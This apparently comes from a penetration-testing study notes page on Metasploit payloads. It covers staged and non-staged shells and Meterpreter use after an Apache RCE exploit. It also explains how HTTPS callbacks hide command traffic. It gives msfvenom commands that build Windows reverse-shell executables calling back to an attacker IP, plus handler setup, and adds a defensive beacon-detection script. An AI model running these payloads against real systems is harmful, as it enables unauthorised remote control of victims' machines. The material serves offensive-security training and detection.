# Payloads

## **Staged vs Non-Staged**

* **Non-Staged Payload**: The complete payload (shellcode and all) is sent in one piece; more stable but larger. E.g. `payload/linux/x64/shell_reverse_tcp`.
* **Staged Payload**: A two-step process. A small stager is delivered first, which then connects back to the attacker's machine to fetch the rest of the payload (the stage). Staged payloads have an extra `/` between stage and stager in the name, e.g. `shell/reverse_tcp`, versus the non-staged `shell_reverse_tcp`.

> ***Staged payloads** are useful when **space is limited** or for **evading detection**, but they create extra network traffic. First, a small initial program (the **stager**) runs on the target machine. Its job is to reach back to your attacker machine and download the remainder of the payload (the **stage**) over the network, which is then **injected directly into the victim machine's memory**.*

## **Meterpreter**

Meterpreter is a powerful, flexible payload that runs entirely in memory, leaving fewer traces and offering encrypted communication, file transfers, and system management tools. It enables advanced post-exploitation actions.

```bash
# Set Meterpreter payload
msf6 exploit(multi/http/apache_normalize_path_rce) > set payload 13
payload => linux/x64/meterpreter_reverse_tcp

# Run exploit
msf6 exploit(multi/http/apache_normalize_path_rce) > run

# Example Meterpreter commands
meterpreter > sysinfo
meterpreter > getuid
```

Commands with the `l` prefix operate locally, i.e., on our attacker machine.

```bash
meterpreter > help

...
Stdapi: File system Commands
============================

    Command                   Description
    -------                   -----------
...
    lls                       List local files
    ls                        List files
...
```

### Channels

Meterpreter allows the creation of multiple command shells (**channels**).

```bash
# create a new channel
meterpreter > shell
Process 135 created.
Channel 1 created.
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
^Z
Background channel 1? [y/N]  y

# create a second channel
meterpreter > shell
Process 137 created.
Channel 2 created.
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
^Z
Background channel 2? [y/N]  y

# list all active channels
meterpreter > channel -l

    Id  Class  Type
    --  -----  ----
    1   3      stdapi_process
    2   3      stdapi_process
```

### **HTTPS**

HTTPS Meterpreter payloads use encrypted web traffic for communication. When the infected target connects back to the attacker's machine, it does so over HTTPS, **making the traffic look like regular web activity**. Security tools monitoring the network see only encrypted requests, not the actual commands inside; what stays visible is the metadata (destination address, certificate, and the regular callback cadence), which is what network defenders key on. If a defender inspects the callback URL directly in a browser, they'll just see a generic `404` error, not the payload or its commands. However, Meterpreter is well-known and is detected by many antivirus products. A common strategy is to use a simple shell to gain initial access, then deploy Meterpreter after evading detection.

```bash
# Example HTTPS Meterpreter payload
payload/linux/x64/meterpreter_reverse_https
```
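The paragraph above notes that TLS hides a Meterpreter session's contents but not its callback pattern. The following is an added example (not code from the original page or from Metasploit) of the defender-side check that follows from that: a small beacon detector run over a constructed, simplified proxy log. The log format, hostnames and addresses are invented for the example; the thresholds `MIN_HITS` and `MAX_JITTER` are assumptions to tune per environment.

```python
"""Spotting a periodic HTTPS callback in proxy logs.

Added example for this page, not code from the original. The log format
is a simplified, constructed proxy log (timestamp, client IP, method,
destination host:port, HTTP status); the hostnames and addresses are
invented for the example.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: 10.0.0.5 contacts one host roughly every 60 seconds,
# which is what a TLS-wrapped reverse_https session looks like from the
# outside, mixed with ordinary irregular browsing from two workstations.
SAMPLE_LOG = """\
2024-05-01T09:00:00 10.0.0.5 CONNECT update-check.example-c2.test:443 200
2024-05-01T09:00:12 10.0.0.5 CONNECT cdn.example-static.test:443 200
2024-05-01T09:00:13 10.0.0.5 CONNECT cdn.example-static.test:443 200
2024-05-01T09:01:00 10.0.0.7 CONNECT cdn.example-static.test:443 200
2024-05-01T09:01:01 10.0.0.5 CONNECT update-check.example-c2.test:443 200
2024-05-01T09:01:59 10.0.0.5 CONNECT update-check.example-c2.test:443 200
2024-05-01T09:02:10 10.0.0.7 CONNECT mail.example-saas.test:443 200
2024-05-01T09:02:11 10.0.0.7 CONNECT mail.example-saas.test:443 200
2024-05-01T09:02:15 10.0.0.7 CONNECT mail.example-saas.test:443 200
2024-05-01T09:03:00 10.0.0.5 CONNECT update-check.example-c2.test:443 200
2024-05-01T09:03:40 10.0.0.5 CONNECT cdn.example-static.test:443 200
2024-05-01T09:04:02 10.0.0.5 CONNECT update-check.example-c2.test:443 200
2024-05-01T09:04:58 10.0.0.5 CONNECT update-check.example-c2.test:443 200
2024-05-01T09:05:30 10.0.0.7 CONNECT cdn.example-static.test:443 200
2024-05-01T09:06:01 10.0.0.5 CONNECT update-check.example-c2.test:443 200
2024-05-01T09:06:40 10.0.0.7 CONNECT mail.example-saas.test:443 200
2024-05-01T09:07:00 10.0.0.5 CONNECT update-check.example-c2.test:443 200
2024-05-01T09:07:59 10.0.0.5 CONNECT update-check.example-c2.test:443 200
2024-05-01T09:08:15 10.0.0.5 CONNECT cdn.example-static.test:443 200
2024-05-01T09:09:01 10.0.0.5 CONNECT update-check.example-c2.test:443 200
"""

MIN_HITS = 6        # assumed threshold: fewer requests cannot establish a rhythm
MAX_JITTER = 0.2    # assumed threshold: coefficient of variation of the gaps


def parse_log(text):
    """Yield (timestamp, client, host) tuples from the constructed log format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, dest, _status = line.split()
        host = dest.rsplit(":", 1)[0]
        yield datetime.fromisoformat(ts), client, host


def detect_beacons(records, min_hits=MIN_HITS, max_jitter=MAX_JITTER):
    """Flag (client, host) pairs whose requests arrive at a near-constant interval.

    TLS hides what a session carries, but not who talks to whom and how often;
    a regular cadence from one client to a host nobody else visits stands out.
    """
    by_pair = defaultdict(list)
    clients_per_host = defaultdict(set)
    for ts, client, host in records:
        by_pair[(client, host)].append(ts)
        clients_per_host[host].add(client)

    findings = []
    for (client, host), stamps in by_pair.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        jitter = pstdev(gaps) / avg
        if jitter <= max_jitter:
            findings.append({
                "client": client,
                "host": host,
                "hits": len(stamps),
                "mean_interval_s": round(avg, 1),
                "jitter": round(jitter, 3),
                "distinct_clients": len(clients_per_host[host]),
            })
    return findings


if __name__ == "__main__":
    for finding in detect_beacons(parse_log(SAMPLE_LOG)):
        print(finding)
```

Run against the sample, only the `10.0.0.5` to `update-check.example-c2.test` pair is reported: ten requests about 60 seconds apart with very low jitter, to a host no other client contacts. The browsing traffic is either too sparse or too irregular to pass. Real implants add sleep jitter, so `MAX_JITTER` is a tuning knob rather than a fixed rule, and rarity of the destination across the fleet is the second signal worth weighting.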

## **msfvenom**

msfvenom generates payloads in various output formats (executables, scripts, raw shellcode). The reverse payloads shown below initiate a connection back to the attacker's machine, allowing remote control.

{% code overflow="wrap" %}

```bash
# List available payloads for Windows x64
$ msfvenom -l payloads --platform windows --arch x64

# Generate non-staged payload (Windows)
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.242 LPORT=443 -f exe -o nonstaged.exe

# Generate staged payload (Windows)
$ msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.45.242 LPORT=443 -f exe -o staged.exe
```

{% endcode %}

Staged payloads need a **Metasploit handler** (`multi/handler`) since tools like `nc` cannot handle them.

> *`nc` will be able to catch them, but we won't be able to send any commands through them.*

```bash
# Start multi/handler for staged payloads
msf6 exploit(multi/http/apache_normalize_path_rce) > use multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > set LHOST 192.168.45.242
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > run
```
